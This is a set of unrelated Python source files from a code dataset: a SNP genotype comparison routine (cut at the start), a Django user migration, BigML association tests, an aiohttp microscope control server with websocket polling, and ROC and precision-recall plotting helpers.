common_inds = (commonSNPs_1[1][common_inds[0]], common_inds[1])
else:
log.info("identify common positions")
common_inds = snp_genotype.Genotype.get_common_positions( inputs_1.chrs, inputs_1.pos, inputs_2.chrs, inputs_2.pos )
log.info("done!")
unique_1 = len(inputs_1.chrs) - len(common_inds[0])
unique_2 = len(inputs_2.chrs) - len(common_inds[0])
common = np.zeros(0, dtype=int)
scores = np.zeros(0, dtype=int)
inputs_1.filter_chr_names()
inputs_2.filter_chr_names()
common_chrs = np.intersect1d(inputs_1.g_chrs_ids, inputs_2.g_chrs_ids)
for i in common_chrs:
perchrTarInd = np.where(inputs_1.g_chrs[common_inds[0]] == i)[0]
log.info("Analysing chromosome %s positions", i)
t_common = len(perchrTarInd)
t_scores = np.sum(np.array(inputs_1.gt[common_inds[0][perchrTarInd]] == inputs_2.gt[common_inds[1][perchrTarInd]], dtype = int))
snpmatch_stats[i] = [get_fraction(t_scores, t_common), t_common]
common = np.append(common, t_common)
scores = np.append(scores, t_scores)
snpmatch_stats['matches'] = [get_fraction(np.sum(scores), np.sum(common)), np.sum(common)]
snpmatch_stats['unique'] = {"%s" % os.path.basename(inFile_1): [get_fraction(unique_1, len(inputs_1.chrs)), len(inputs_1.chrs)], "%s" % os.path.basename(inFile_2): [get_fraction(unique_2, len(inputs_2.chrs)), len(inputs_2.chrs)] }
if outFile:
# outFile = "genotyper"
log.info("writing output in a file: %s" % outFile + ".matches.json")
with open(outFile + ".matches.json", "w") as out_stats:
out_stats.write(json.dumps(snpmatch_stats, sort_keys=True, indent=4))
log.info("finished!")
return(snpmatch_stats)
| StarcoderdataPython |
3258897 | <reponame>UNCDarkside/DarksiteAPI<filename>darksite/account/migrations/0001_initial.py
# Generated by Django 2.1.4 on 2018-12-16 05:56
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [("auth", "0009_alter_user_last_name_max_length")]
operations = [
migrations.CreateModel(
name="User",
fields=[
(
"password",
models.CharField(max_length=128, verbose_name="password"),
),
(
"is_superuser",
models.BooleanField(
default=False,
help_text="Designates that this user has all permissions without explicitly assigning them.",
verbose_name="superuser status",
),
),
(
"created",
models.DateTimeField(
auto_now_add=True,
help_text="The time when the user was created.",
verbose_name="creation time",
),
),
(
"email",
models.EmailField(
help_text="The user's email address.",
max_length=254,
unique=True,
verbose_name="email address",
),
),
(
"id",
models.UUIDField(
default=uuid.uuid4,
help_text="A unique identifier for the user.",
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"is_active",
models.BooleanField(
default=True,
help_text="Designates if the user is allowed to log in.",
verbose_name="active status",
),
),
(
"is_staff",
models.BooleanField(
default=False,
help_text="Designates if the user has access to the admin site.",
verbose_name="admin status",
),
),
(
"last_login",
models.DateTimeField(
blank=True,
help_text="The time of the user's last login.",
null=True,
verbose_name="last login time",
),
),
(
"name",
models.CharField(
help_text="A publicly displayed name for the user.",
max_length=100,
verbose_name="name",
),
),
(
"updated",
models.DateTimeField(
auto_now=True,
help_text="The last time the user was updated.",
verbose_name="update time",
),
),
(
"groups",
models.ManyToManyField(
blank=True,
help_text="The groups this user belongs to. A user will get all permissions granted to each of their groups.",
related_name="user_set",
related_query_name="user",
to="auth.Group",
verbose_name="groups",
),
),
(
"user_permissions",
models.ManyToManyField(
blank=True,
help_text="Specific permissions for this user.",
related_name="user_set",
related_query_name="user",
to="auth.Permission",
verbose_name="user permissions",
),
),
],
options={
"verbose_name": "user",
"verbose_name_plural": "users",
"ordering": ("created",),
},
)
]
| StarcoderdataPython |
9690136 | # -*- coding: utf-8 -*-
#
# Copyright 2015-2022 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" Creating association
"""
import sys
from .world import world, setup_module, teardown_module, show_doc, show_method
from . import create_source_steps as source_create
from . import create_dataset_steps as dataset_create
from . import create_association_steps as association_create
class TestAssociation(object):
def setup(self):
"""
Debug information
"""
print("\n-------------------\nTests in: %s\n" % __name__)
def teardown(self):
"""
Debug information
"""
print("\nEnd of tests in: %s\n-------------------\n" % __name__)
def test_scenario1(self):
"""
Scenario: Successfully creating associations from a dataset:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <source_wait> secs
And I create a dataset
And I wait until the dataset is ready less than <dataset_wait> secs
And I create associations from a dataset
And I wait until the association is ready less than <model_wait> secs
And I update the association name to "<association_name>"
When I wait until the association is ready less than <model_wait> secs
Then the association name is "<association_name>"
"""
show_doc(self.test_scenario1)
headers = ["data", "source_wait", "dataset_wait", "model_wait",
"association_name"]
examples = [
['data/iris.csv', '10', '10', '50', 'my new association name']]
for example in examples:
example = dict(zip(headers, example))
show_method(self, sys._getframe().f_code.co_name, example)
source_create.i_upload_a_file(
self, example["data"], shared=example["data"])
source_create.the_source_is_finished(
self, example["source_wait"], shared=example["data"])
dataset_create.i_create_a_dataset(self, shared=example["data"])
dataset_create.the_dataset_is_finished_in_less_than(
self, example["dataset_wait"], shared=example["data"])
association_create.i_create_an_association_from_dataset(self)
association_create.the_association_is_finished_in_less_than(
self, example["model_wait"])
association_create.i_update_association_name(
self, example["association_name"])
association_create.the_association_is_finished_in_less_than(
self, example["model_wait"])
association_create.i_check_association_name(
self, example["association_name"])
def test_scenario2(self):
"""
Scenario: Successfully creating local association object:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <source_wait> secs
And I create a dataset
And I wait until the dataset is ready less than <dataset_wait> secs
And I create an association from a dataset
And I wait until the association is ready less than <model_wait> secs
And I create a local association
When I get the rules for <"item_list">
Then the first rule is "<JSON_rule>"
"""
show_doc(self.test_scenario2)
headers = ["data", "source_wait", "dataset_wait", "model_wait",
"item_list", "JSON_rule"]
examples = [
['data/tiny_mushrooms.csv', '10', '20', '50', ["Edible"],
{'p_value': 5.26971e-31, 'confidence': 1,
'rhs_cover': [0.488, 122], 'leverage': 0.24986,
'rhs': [19], 'rule_id': '000002', 'lift': 2.04918,
'lhs': [0, 21, 16, 7], 'lhs_cover': [0.488, 122],
'support': [0.488, 122]}]]
for example in examples:
example = dict(zip(headers, example))
show_method(self, sys._getframe().f_code.co_name, example)
source_create.i_upload_a_file(self, example["data"])
source_create.the_source_is_finished(
self, example["source_wait"], shared=example["data"])
dataset_create.i_create_a_dataset(self, shared=example["data"])
dataset_create.the_dataset_is_finished_in_less_than(
self, example["dataset_wait"], shared=example["data"])
association_create.i_create_an_association_from_dataset(self)
association_create.the_association_is_finished_in_less_than(
self, example["model_wait"])
association_create.i_create_a_local_association(self)
association_create.i_get_rules_for_item_list(
self, example["item_list"])
association_create.the_first_rule_is(
self, example["JSON_rule"])
def test_scenario3(self):
"""
Scenario: Successfully creating local association object:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <source_wait> secs
And I create a dataset
And I wait until the dataset is ready less than <dataset_wait> secs
And I create an association with search strategy "<strategy>" from a dataset
And I wait until the association is ready less than <model_wait> secs
And I create a local association
When I get the rules for <"item_list">
Then the first rule is "<JSON_rule>"
"""
show_doc(self.test_scenario2)
headers = ["data", "source_wait", "dataset_wait", "model_wait",
"item_list", "JSON_rule", "strategy"]
examples = [
['data/tiny_mushrooms.csv', '10', '20', '50', ["Edible"],
{'p_value': 2.08358e-17, 'confidence': 0.79279,
'rhs_cover': [0.704, 176], 'leverage': 0.07885,
'rhs': [11], 'rule_id': '000007', 'lift': 1.12613,
'lhs': [0], 'lhs_cover': [0.888, 222],
'support': [0.704, 176]}, 'lhs_cover']]
for example in examples:
example = dict(zip(headers, example))
show_method(self, sys._getframe().f_code.co_name, example)
source_create.i_upload_a_file(
self, example["data"], shared=example["data"])
source_create.the_source_is_finished(
self, example["source_wait"], shared=example["data"])
dataset_create.i_create_a_dataset(self, shared=example["data"])
dataset_create.the_dataset_is_finished_in_less_than(
self, example["dataset_wait"], shared=example["data"])
association_create.i_create_an_association_with_strategy_from_dataset(
self, example["strategy"])
association_create.the_association_is_finished_in_less_than(
self, example["model_wait"])
association_create.i_create_a_local_association(self)
association_create.i_get_rules_for_item_list(
self, example["item_list"])
association_create.the_first_rule_is(self, example["JSON_rule"])
| StarcoderdataPython |
76202 | #!/usr/bin/python
from __future__ import division, print_function
# require python 3.5 for aiohttp
import sys
if sys.hexversion < 0x03050000:
sys.exit("Python 3.5 or newer is required to run this program.")
import numpy as np
import json
from io import BytesIO
import asyncio
from aiohttp import web, WSMsgType
from contextlib import suppress
import traceback
class MicroscopeServerWithEvents:
"""
Implements the same HTTP server as server.py
Additionally polls the current state of the Titan microscope
and -in case of any changes- sends an event via a websocket
connection.
HTTP-URLs are supposed to follow the format
http://127.0.0.1:8080/v1/...
Websocket connections are initialized via the websocket URL
ws://127.0.0.1:8080/ws/
:param host IP the webserver is running under. Default is "0.0.0.0"
(run on all interfaces)
:type host str
:param port Port the webserver is running under. Default is "8080"
(default HTTP-port)
:type port int
:param microscope the Microscope to use (either NullMicroscope()
or Microscope())
:type microscope Microscope
"""
def __init__(self, microscope, host="0.0.0.0", port=8080):
self.host = host
self.port = port
self.microscope = microscope
print("Configuring web server for host=%s, port=%s" % (self.host, self.port))
# a dict for storing polling results
self.microscope_state = dict()
self.microscope_state_lock = asyncio.Lock()
# set of client references
self.clients = set()
self.clients_lock = asyncio.Lock()
async def http_get_handler_v1(self, request):
"""
aiohttp handler fur GET request for V1
:param request: the aiohttp GET request
:return: the aiohttp response
"""
command = request.match_info['name']
parameter = request.rel_url.query
try:
response = self.do_GET_V1(command, parameter)
if response is None:
# unsupported command: send status 204
return web.Response(body="Unsupported command {}"
.format(command),
status=204)
else:
# send JSON response and (default) status 200
encoded_response = ArrayJSONEncoder()\
.encode(response).encode("utf-8")
return web.Response(body=encoded_response,
content_type="application/json")
except MicroscopeException as e:
# regular exception due to misconfigurations etc.: send error status 404
return web.Response(body=e, status=404)
except Exception as e:
# any exception beyond that: send error status 500
return web.Response(body=e, status=500)
def do_GET_V1(self, command, parameter):
"""
Handler for HTTP V1 GET requests
:param command: The GET command to execute
:param parameter: optional query parameter ,
see "acquire" command
"""
# Check for known endpoints
response = None
if command == "family":
response = self.microscope.get_family()
elif command == "microscope_id":
response = self.microscope.get_microscope_id()
elif command == "version":
response = self.microscope.get_version()
elif command == "voltage":
response = self.microscope.get_voltage()
elif command == "vacuum":
response = self.microscope.get_vacuum()
elif command == "stage_holder":
response = self.microscope.get_stage_holder()
elif command == "stage_status":
response = self.microscope.get_stage_status()
elif command == "stage_position":
response = self.microscope.get_stage_position()
elif command == "stage_limits":
response = self.microscope.get_stage_limits()
elif command == "detectors":
response = self.microscope.get_detectors()
elif command == "image_shift":
response = self.microscope.get_image_shift()
elif command == "beam_shift":
response = self.microscope.get_beam_shift()
elif command == "beam_tilt":
response = self.microscope.get_beam_tilt()
elif command == "instrument_mode":
response = self.microscope.get_instrument_mode()
elif command == "instrument_mode_string":
response = self.microscope.get_instrument_mode_string()
elif command == "df_mode":
response = self.microscope.get_df_mode()
elif command == "df_mode_string":
response = self.microscope.get_df_mode_string()
elif command == "projection_sub_mode":
response = self.microscope.get_projection_sub_mode()
elif command == "projection_mode":
response = self.microscope.get_projection_mode()
elif command == "projection_mode_string":
response = self.microscope.get_projection_mode_string()
elif command == "projection_mode_type_string":
response = self.microscope.get_projection_mode_type_string()
elif command == "illumination_mode":
response = self.microscope.get_illumination_mode()
elif command == "illumination_mode_string":
response = self.microscope.get_illumination_mode_string()
elif command == "illuminated_area":
response = self.microscope.get_illuminated_area()
elif command == "condenser_mode":
response = self.microscope.get_condenser_mode()
elif command == "condenser_mode_string":
response = self.microscope.get_condenser_mode_string()
elif command == "spot_size_index":
response = self.microscope.get_spot_size_index()
elif command == "magnification_index":
response = self.microscope.get_magnification_index()
elif command == "stem_magnification":
response = self.microscope.get_stem_magnification()
elif command == "indicated_camera_length":
response = self.microscope.get_indicated_camera_length()
elif command == "indicated_magnification":
response = self.microscope.get_indicated_magnification()
elif command == "defocus":
response = self.microscope.get_defocus()
elif command == "probe_defocus":
response = self.microscope.get_probe_defocus()
elif command == "objective_excitation":
response = self.microscope.get_objective_excitation()
elif command == "intensity":
response = self.microscope.get_intensity()
elif command == "objective_stigmator":
response = self.microscope.get_objective_stigmator()
elif command == "condenser_stigmator":
response = self.microscope.get_condenser_stigmator()
elif command == "diffraction_shift":
response = self.microscope.get_diffraction_shift()
elif command == "optics_state":
response = self.microscope.get_optics_state()
elif command == "beam_blanked":
response = self.microscope.get_beam_blanked()
elif command == "voltage_offset":
print('Getting voltage_offset...')
# HT offset supported by StdScript 7.10
response = self.microscope.get_voltage_offset()
print('Returning voltage_offset=%s...' % response)
elif command.startswith("detector_param/"):
try:
name = command[15:]
response = self.microscope.get_detector_param(name)
except KeyError:
raise MicroscopeException('Unknown detector: %s' % command)
elif command == "acquire":
try:
detectors = parameter["detectors"]
except KeyError:
raise MicroscopeException('No detectors: %s' % command)
response = self.microscope.acquire(*detectors)
else:
raise MicroscopeException('Unknown endpoint: %s' % command)
print('Returning response %s for command %s...' % (response, command))
return response
async def http_put_handler_v1(self, request):
"""
aiohttp handler fur PUT request for V1
:param request: the aiohttp PUT request
:return: the aiohttp response
"""
command = request.match_info['name']
content_length = request.headers['content-length']
if content_length is not None:
if int(content_length) > 4096:
raise ValueError("Too much content...")
try:
# get JSON content
text_content = await request.text()
json_content = json.loads(text_content)
response = self.do_PUT_V1(command, json_content)
if response is None:
# unsupported command: send status 204
return web.Response(body="Unsupported command {}"
.format(command),
status=204)
else:
# send JSON response and (default) status 200
encoded_response = ArrayJSONEncoder()\
.encode(response).encode("utf-8")
return web.Response(body=encoded_response,
content_type="application/json")
except MicroscopeException as e:
# regular exception due to misconfigurations etc.: send error status 404
return web.Response(body=e, status=404)
except Exception as e:
# any exception beyond that: send error status 500
return web.Response(body=e, status=500)
def do_PUT_V1(self, command, json_content):
"""
Handler for HTTP V1 PUT requests
:param command: The PUT command to execute
:param json_content: the content/value to set
"""
response = None
# Check for known endpoints
if command == "stage_position":
method = json_content.get("method", "GO")
pos = dict((k, json_content[k]) for k in json_content.keys() if k in self.microscope.STAGE_AXES)
try:
pos['speed'] = json_content['speed']
except KeyError:
pass
self.microscope.set_stage_position(pos, method=method)
elif command == "image_shift":
self.microscope.set_image_shift(json_content)
elif command == "beam_shift":
self.microscope.set_beam_shift(json_content)
elif command == "beam_tilt":
self.microscope.set_beam_tilt(json_content)
elif command == "df_mode":
self.microscope.set_df_mode(json_content)
elif command == "illuminated_area":
self.microscope.set_illuminated_area(json_content)
elif command == "projection_mode":
self.microscope.set_projection_mode(json_content)
elif command == "magnification_index":
self.microscope.set_magnification_index(json_content)
elif command == "stem_magnification":
self.microscope.set_stem_magnification(json_content)
elif command == "defocus":
self.microscope.set_defocus(json_content)
elif command == "probe_defocus":
self.microscope.set_probe_defocus(json_content)
elif command == "intensity":
self.microscope.set_intensity(json_content)
elif command == "diffraction_shift":
self.microscope.set_diffraction_shift(json_content)
elif command == "objective_stigmator":
self.microscope.set_objective_stigmator(json_content)
elif command == "condenser_stigmator":
self.microscope.set_condenser_stigmator(json_content)
elif command == "beam_blanked":
self.microscope.set_beam_blanked(json_content)
elif command == "voltage_offset":
# HT offset supported by StdScript 7.10
self.microscope.set_voltage_offset(json_content)
elif command.startswith("detector_param/"):
try:
name = command[15:]
response = self.microscope.set_detector_param(name, json_content)
except KeyError:
raise MicroscopeException('Unknown detector: %s' % command)
elif command == "normalize":
mode = json_content
try:
self.microscope.normalize(mode)
except ValueError:
raise MicroscopeException('Unknown mode: %s' % mode)
else:
raise MicroscopeException('Unknown endpoint: %s' % command)
return response
async def websocket_handler_v1(self, request):
"""
The aiohttp handler for websocket requests
:param request: The connection request
:return: the websocket response
"""
print('Websocket client session opened.')
# available options for WebSocketResponse client session:
# autoping=True (default), heartbeat=5 (necessary for pings)
# receive_timeout=10
ws = web.WebSocketResponse()
remote_ip = request.remote
print('Websocket handler for IP %s created.' % remote_ip)
await ws.prepare(request)
# add client to set
await self.add_websocket_client(ws)
try:
async for msg in ws:
if msg.type == WSMsgType.TEXT:
if msg.data != 'close':
print('websocket connection received unsupported text message: "%s"' % msg.data)
await ws.close()
elif msg.type == WSMsgType.PING:
pass
# print('websocket connection received PING')
elif msg.type == WSMsgType.PONG:
pass
# print('websocket connection received PONG')
elif msg.type == WSMsgType.ERROR:
await self.remove_websocket_client(ws)
print('websocket connection closed with exception %s' %
ws.exception())
await ws.close()
else:
print('Received unsupported websocket message type "%s": closing connection' % msg.type)
await ws.close()
finally:
print('Websocket client session closed for IP %s' % remote_ip)
await ws.close()
await self.remove_websocket_client(ws)
return ws
async def add_websocket_client(self, ws):
async with self.clients_lock:
print('number of clients before adding new client: %s ' %
len(self.clients))
self.clients.add(ws)
print('number of clients after adding new client: %s ' %
len(self.clients))
async with self.microscope_state_lock:
if self.microscope_state:
print('Sending microscope state to new client.')
await ws.send_json(self.microscope_state)
async def remove_websocket_client(self, ws):
async with self.clients_lock:
print("number of clients before removing client: %s " %
len(self.clients))
self.clients.remove(ws)
print("number of clients after removing client: %s " %
len(self.clients))
async def broadcast_to_websocket_clients(self, obj):
"""
Converts obj to JSON string and sends the string to all connected websocket clients.
:param obj: JSON-serializable object
:return:
"""
async with self.clients_lock:
for ws in self.clients:
# send object as JSON to websocket client
await ws.send_json(obj)
async def change_microscope_state(self, new_values):
"""
Change a set of entries in the microscope state
and notify websocket clients in case of changes
:param changes: A dict with command-result values
:type changes: dict
:return:
"""
changes = dict()
async with self.microscope_state_lock:
for command in new_values:
new_result = new_values[command]
if not command in self.microscope_state.keys():
# add new command/result to changes
changes[command] = new_result
# update value
self.microscope_state[command] = new_result
elif new_result != self.microscope_state[command]:
# results differ: add new result to changes
changes[command] = new_result
# update value
self.microscope_state[command] = new_result
if len(changes) > 0:
print("changes=%s" % changes)
if changes:
await self.broadcast_to_websocket_clients(changes)
def reset_microscope_state(self):
self.microscope_state = dict()
def run_server(self):
print("Starting web server with events under host=%s, port=%s" % (self.host, self.port))
app = web.Application()
# add routes for
# - HTTP-GET/PUT, e.g. http://127.0.0.1:8080/v1/projection_mode
# - websocket connection ws://127.0.0.1:8080/ws/v1
app.add_routes([web.get('/ws/v1', self.websocket_handler_v1), #
web.get(r'/v1/{name:.+}', self.http_get_handler_v1),
web.put(r'/v1/{name:.+}', self.http_put_handler_v1),
])
web.run_app(app, host=self.host, port=self.port)
class MicroscopeException(Exception):
"""
Special exception class for returning HTTP status 204
"""
def __init__(self, *args, **kw):
super(MicroscopeException, self).__init__(*args, **kw)
class ArrayJSONEncoder(json.JSONEncoder):
"""
Numpy array encoding JSON encoder
"""
allowed_dtypes = {"INT8", "INT16", "INT32", "INT64", "UINT8", "UINT16", "UINT32", "UINT64", "FLOAT32", "FLOAT64"}
def default(self, obj):
if isinstance(obj, np.ndarray):
import sys, base64
dtype_name = obj.dtype.name.upper()
if dtype_name not in self.allowed_dtypes:
return json.JSONEncoder.default(self, obj)
if obj.dtype.byteorder == '<':
endian = "LITTLE"
elif obj.dtype.byteorder == '>':
endian = "BIG"
else:
endian = sys.byteorder.upper()
return {
'width': obj.shape[1],
'height': obj.shape[0],
'type': dtype_name,
'endianness': endian,
'encoding': "BASE64",
'data': base64.b64encode(obj).decode("ascii")
}
return json.JSONEncoder.default(self, obj)
def _gzipencode(content):
"""GZIP encode bytes object"""
import gzip
out = BytesIO()
f = gzip.GzipFile(fileobj=out, mode='w', compresslevel=5)
f.write(content)
f.close()
return out.getvalue()
def _parse_enum(type, item):
"""Try to parse 'item' (string or integer) to enum 'type'"""
try:
return type[item]
except:
return type(item)
class MicroscopeEventPublisher:
"""
Periodically polls the microscope for a
number of changes and forwards the result
to the microscope state.
:param microscope_server: The server instance
:param sleep_time: The sleeping time between
polling calls.
:param polling_config: A configuration dict of
methods and return types to poll.
value is a tuple consisting of a conversion method
(e.g. "float()") and a scaling factor
(for int/float-types)
"""
def __init__(self, microscope_server,
sleep_time, polling_config):
self.microscope_server = microscope_server
self.sleep_time = sleep_time
self.polling_config = polling_config
# the microscope state representation
self.microscope_state = dict()
# the method used for polling periodically
self.polling_func = self.check_for_microscope_changes
self.is_started = False
self._task = None
def start(self):
# reset microscope state
self.microscope_server.reset_microscope_state()
if not self.is_started:
self.is_started = True
# Start task to call func periodically:
self._task = asyncio.ensure_future(self._run())
def stop(self):
# reset microscope state
self.microscope_server.reset_microscope_state()
if self.is_started:
self.is_started = False
# Stop task and await it stopped:
self._task.cancel()
async def _run(self):
while True:
# sleep as configured for the instance
await asyncio.sleep(self.sleep_time)
# call polling function
await self.polling_func()
async def check_for_microscope_changes(self):
#print("checking for microscope changes...")
try:
changed = {}
all_results = dict()
for get_command in self.polling_config:
try:
# execute get command
# (here: imply parameterless command)
result_raw = self.microscope_server.do_GET_V1(get_command,
None)
#print("found %s=%s..." %
# (get_command, result_raw))
casting_func = self.polling_config[get_command][0]
result = casting_func(result_raw)
#print("Adding %s=%s to results..." %
# (get_command, result))
all_results[get_command] = result
except Exception as exc:
print("TEMScripting method '{}' failed "
"while polling: %s" % (get_command, exc))
await self.microscope_server.change_microscope_state(all_results)
except Exception as exc:
traceback.print_exc()
print("Polling failed: %s" % exc)
if __name__ == '__main__':
host="0.0.0.0"
port=8080
# define all TEMScripting methods which should be polled
# during one polling event via the web server.
# value is a tuple consisting of a conversion method
# (e.g. "float()") and a scaling factor (for int/float)
# for the result of the method
tem_scripting_method_config = {
# for meta data key 'condenser.mode'
"instrument_mode_string": (str, 1), # "TEM"/"STEM"
"illumination_mode": (int, 1), # e.g., 0 ("NANOPROBE"), 1: ("MICROPROBE")
"df_mode_string": (str, 1), # e.g., "CARTESIAN", "OFF"
"spot_size_index": (int, 1), # e.g., 3
"condenser_mode_string": (str, 1), # e.g., "PROBE"
"beam_blanked": (bool, 1), # True, False
# for meta data key 'electron_gun.voltage'
"voltage": (float, 1), # e.g., "200"
# for meta data key "objective.mode -> projector.camera_length"
"indicated_camera_length": (int, 1), # e.g., "0", in meters (?)
# for meta data key "objective.mode -> projector.magnification"
"indicated_magnification": (float, 1), # e.g., 200000.0
# for meta data key "objective.mode -> projector.mode"
"projection_mode_string": (str, 1), # e.g., "SA"
"projection_mode_type_string": (str, 1),# e.g., "IMAGING"
# for meta data key "objective.mode -> scan_driver.magnification"
"stem_magnification": (float, 1), # e.g., "6000"
}
from .microscope import Microscope
microscope = Microscope()
server = MicroscopeServerWithEvents(microscope=microscope,
host=host, port=port)
microscope_event_publisher = MicroscopeEventPublisher(server, 1.0,
tem_scripting_method_config)
try:
microscope_event_publisher.start()
server.run_server()
finally:
microscope_event_publisher.stop()
| StarcoderdataPython |
9660995 | import os, logging
import numpy as np
import matplotlib.pyplot as plt
from scipy import interp
from textwrap import wrap
from sklearn.metrics import precision_recall_curve, average_precision_score, auc
logger = logging.getLogger('eyegaze')
class VisdomLinePlotter(object):
"""Plots to Visdom"""
def __init__(self, server, env_name='main'):
self.viz = server
self.env = env_name
self.plots = {}
def plot(self, var_name, split_name, title_name, x, y):
if var_name not in self.plots:
self.plots[var_name] = self.viz.line(X=np.array([x,x]), Y=np.array([y,y]), env=self.env, opts=dict(
legend=[split_name],
title=title_name,
xlabel='Iterations',
ylabel=var_name
))
else:
self.viz.line(X=np.array([x]), Y=np.array([y]), env=self.env, win=self.plots[var_name], name=split_name, update = 'append')
def get_cmap(n, name='Set1'):
"""
Source: https://stackoverflow.com/questions/14720331/how-to-generate-random-colors-in-matplotlib
Colormaps: https://matplotlib.org/tutorials/colors/colormaps.html
:param n: Number of classes.
:param name: The color map to be selected from.
:return: a function that maps each index in 0, 1, ..., n-1 to a distinct
RGB color; the keyword argument name must be a standard mpl colormap name.
"""
return plt.cm.get_cmap(name, n)
def plot_roc_curve(tpr, fpr, class_names, aurocs, filename, name_variable):
"""
Modified from scikit-example. Plots the ROC curve for the different classes.
:param tpr: true positive rate computed
:param fpr: false positive rate computed
:param class_names:
:param aurocs: computed area under the rocs
:param filename: the output directory where the file should be written
:param name_variable: the filename with the extension.
:return: None (writes the file to disk)
"""
#
# First aggregate all false positive rates
# all_fpr = np.unique(np.concatenate([fpr[i] for i in range(len(class_names))]))
a = []
for i in range(len(class_names)):
if (i in fpr) == True:
# print(class_names[i])
# The np.concatenate does not work on scalars and zero dimensions hence the expand dims.
a.append(np.concatenate(np.expand_dims(fpr[i], axis=1)))
else:
logger.info('--'*30)
logger.info(f"WARNING!!! No: {class_names[i]} found in the set ")
logger.info('--'*30)
#flatten the concatenated list.
flat_list = []
for sublist in a:
for item in sublist:
flat_list.append(item)
flat_np = np.asarray(flat_list)
all_fpr = np.unique(flat_np)
#Now interpolate them results
mean_tpr = np.zeros_like(all_fpr)
for i in range(len(class_names)):
# This is essentially saying interpolate all the curves to the combined
# number of elements using the fpr and tpr of each of these.
if(i in fpr) == True:
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
# mean_tpr /= len(class_names)
# it's actually not considering the missing classes;
mean_tpr /= len(a)
fpr["all_val"] = all_fpr
tpr["all_val"] = mean_tpr
roc_auc = auc(fpr["all_val"], tpr["all_val"])
lw = 2
fig = plt.figure()
fig.subplots_adjust(bottom=0.25)
ax = fig.add_subplot(111)
if len(class_names) > 1:
ax.plot(fpr["all_val"], tpr["all_val"],
label='average ROC(area = {0:0.2f})'
''.format(roc_auc),
color='navy', linestyle=':', linewidth=4)
colors = get_cmap(len(class_names))
for i in range(len(class_names)):
if( i in fpr) == True:
ax.plot(fpr[i], tpr[i], color=colors(i), lw=lw,
label='{0} (area = {1:0.2f})'
''.format(class_names[i], aurocs[i]))
# ax.plot(fpr[i], tpr[i], color=colors(i), lw=lw)
# Plot the 45 degree line.
ax.plot([0, 1], [0, 1], 'k--', lw=lw)
ax.set_xlim([0.0, 1.0])
ax.set_ylim([0.0, 1.05])
ax.set_xlabel('False Positive Rate (FPR/Fallout)')
ax.set_ylabel('True Positive Rate (TPR/Sensitivity)')
ax.set_title("\n".join(wrap(f'{name_variable}')))
# Put a legend to the right of the current axis
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
# # Turn on the minor TICKS, which are required for the minor GRID
ax.minorticks_on()
# # Customize the major grid
ax.grid(which='major', linestyle='-', linewidth='0.5', color='red')
# # Customize the minor grid
ax.grid(which='minor', linestyle='solid', linewidth='0.25', color='black')
# # ax.show()
fig.savefig(os.path.join(filename, 'ROC_'+name_variable), bbox_inches='tight')
# --- Close the figure and clear up the axis to free memory.
plt.cla()
plt.close()
def plot_precision_recall(y, y_hat, class_names, filename, name_variable):
"""
From Scikit example. Plots the precision-recall for multiple classes
:param y: Ground truth labels
:param y_hat: Model predicted labels
:param class_names:
:param filename: the output directory where the file should be written
:param name_variable: the filename with the extension.
:return: None (file gets written to disk)
"""
Y_test = np.asarray(y)
y_score = np.asarray(y_hat)
# For each class
precision = dict()
recall = dict()
average_precision = dict()
n_classes = len(class_names)
for i in range(n_classes):
precision[i], recall[i], _ = precision_recall_curve(Y_test[i],
y_score[i])
average_precision[i] = average_precision_score(Y_test[i], y_score[i])
# A "micro-average": quantifying score on all classes jointly
precision["micro"], recall["micro"], _ = precision_recall_curve(Y_test.ravel(),
y_score.ravel())
average_precision["micro"] = average_precision_score(Y_test, y_score,
average="micro")
logger.info('Average precision score, micro-averaged over all classes: {0:0.2f}'
.format(average_precision["micro"]))
# setup plot details
colors = get_cmap(n_classes)
# plt.figure(figsize=(7, 8))
plt.figure()
f_scores = np.linspace(0.2, 0.8, num=4)
lines = []
labels = []
for f_score in f_scores:
x = np.linspace(0.01, 1)
y = f_score * x / (2 * x - f_score)
l, = plt.plot(x[y >= 0], y[y >= 0], color='gray', alpha=0.2)
plt.annotate('f1={0:0.1f}'.format(f_score), xy=(0.9, y[45] + 0.02))
lines.append(l)
if n_classes > 1:
labels.append('iso-f1 curves')
l, = plt.plot(recall["micro"], precision["micro"], color='gold', lw=2)
lines.append(l)
labels.append('micro-average Precision-recall (area = {0:0.2f})'
''.format(average_precision["micro"]))
for i in range(n_classes):
l, = plt.plot(recall[i], precision[i], color=colors(i), lw=2)
lines.append(l)
labels.append('{0} (area = {1:0.2f})'
''.format(class_names[i], average_precision[i]))
fig = plt.gcf()
fig.subplots_adjust(bottom=0.25)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.title("\n".join(wrap(f'Precision-Recall -- {name_variable}')))
# Put a legend to the right of the current axis
plt.legend(lines, labels, loc='center left', bbox_to_anchor=(1, 0.5))
# Turn on the minor TICKS, which are required for the minor GRID
plt.minorticks_on()
# Customize the major grid
plt.savefig(os.path.join(filename,"Precision-Recall_"+name_variable), bbox_inches='tight')
# --- Close the figure and clear up the axis to free memory.
plt.cla()
plt.close()
| StarcoderdataPython |
1845136 | from app import create_app
from config.app_config import LocalConfig
if __name__ == '__main__':
app = create_app(LocalConfig)
app.run(**app.config['RUN_SETTINGS']) | StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.